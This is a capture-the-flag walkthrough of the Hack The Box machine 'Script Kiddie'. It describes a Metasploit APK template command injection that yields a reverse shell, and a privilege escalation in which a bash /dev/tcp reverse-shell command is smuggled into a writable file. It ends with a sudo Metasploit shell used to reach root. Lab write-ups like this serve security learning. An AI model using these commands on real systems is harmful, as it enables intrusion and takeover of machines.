Script Kiddie : Hack The Box Walk Through
Recently HTB has released a machine named as Script Kiddie. Yess!! Script Kiddie which definitely gives hint about the machine. Like we can assume that we wont be doing much rather than relying on the tools for the same. Guess that’s what Script Kiddie means!!
So lets see how easy this machine could be ??
Concept Learnt:
- Enumeration
- Malicious payload (template bin)
- Reverse Shell
- Privilege escalation
Port Scanning
First thing first, scanning the machine to find the open ports!
Command : nmap -A -T4 10.10.10.226
Concluding that we have port 5000 and 22 open. Port 22 is for SSH and Port 5000 for HTTP!
Enumeration
Lets see what we have got on port 5000 of http. Thus visiting IP address with port number.
Visit: 10.10.10.226:5000/ (in any browser)
By observing the web page , guess we have lot to try for exploits like Command Injection, RFI, LFI, File Upload Vulnerability etc…
After trying all the options, we could get a reverse shell using File Upload Vulnerability leading to command injection . Lets see how it is done..
Malicious Payload Creation:
So we have option of uploading template file for creating payload.
Searching on search engine (Google) about the template unix file exploit , we got the Rapid 7 APK Template Command Injection.
Guess we are lucky here, we have APK template command injection and option of upload APK on the website. So we would creating payload and upload the malicious file to get the reverse shell!
Using Metasploit (msfconsole)we would be using this steps:
FYI: This includes assigning LHOST, LPORT , RHOST, RPORT as shown below:
Once we have set up , the only thing left is to press Fire button!! I mean exploit…
So our malicious payload is ready , giving apk file a executable permission, so it goes smooth. (Location of file may differ from system to system)
Now we would be uploading file to get the reverse shell. But but we need a listener , guess net cat would work listening on port assigned on lport
All set !! Lets upload the file and see what happens!!
Change the options accordingly i mean lhost.
Boom Boom !! We got a reverse shell…
Changing it into interactive shell using python module
Command used: python3 -c “import pty;pty.spawn(‘/bin/bash’)”
Exploring the system we would be completing our first checkpoint i.e user flag
One more thing which caught my attention was we dont have enough permission and we do have other account named pwn in the machine.
We do have scripts and file in machine but cannot access due to lack of privileges.
Privilege Escalation
Escalating to user with having higher privileges i.e pwn
While exploring the system, happen to encounter with file named as hackers. What caught my attention about the file was the group owner assigned to file i.e pwn
So we could be get reverse shell by executing command in the file.
Here is the link which we could : https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
Now just we have manipulate the reverse shell code so as to store in the file.
Thus command used:
echo “ ;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.30/1234 0>&1’ #” >> hackers
Here 10.10.14.30 is the host ip and 1234 is the port where we the listener would be listening.
Before this lets start the listener again on port 1234.
Now executing the command.
We have successfully got the reverse shell of the pwn user!!
Since we have got the higher privileged users. Lets run the script which we aren’t able to i.e scanlosers.sh
Huh!! We got nothing!
Lets check for the sudo (binary) vulnerabilities
Command used : sudo -l
Ohh nice!! We can run metasploit as sudo with no password!!
Running Metasploit with sudo privileges:
FYI: Metasploit console i.e msfconsole could run the bash shell in the terminal
Lets check does it work here:
Yeah!! Moving forward to check whether metasploit has started with root privileges
Ohh!! This was expected. Since we have got everything. Lets move to root directory in metasploit shell and complete our second checkpoint i.e root hash
Finally pwned the user and root of Script Kiddie. It was kinda easy though !
For more blogs and updates stay tuned!
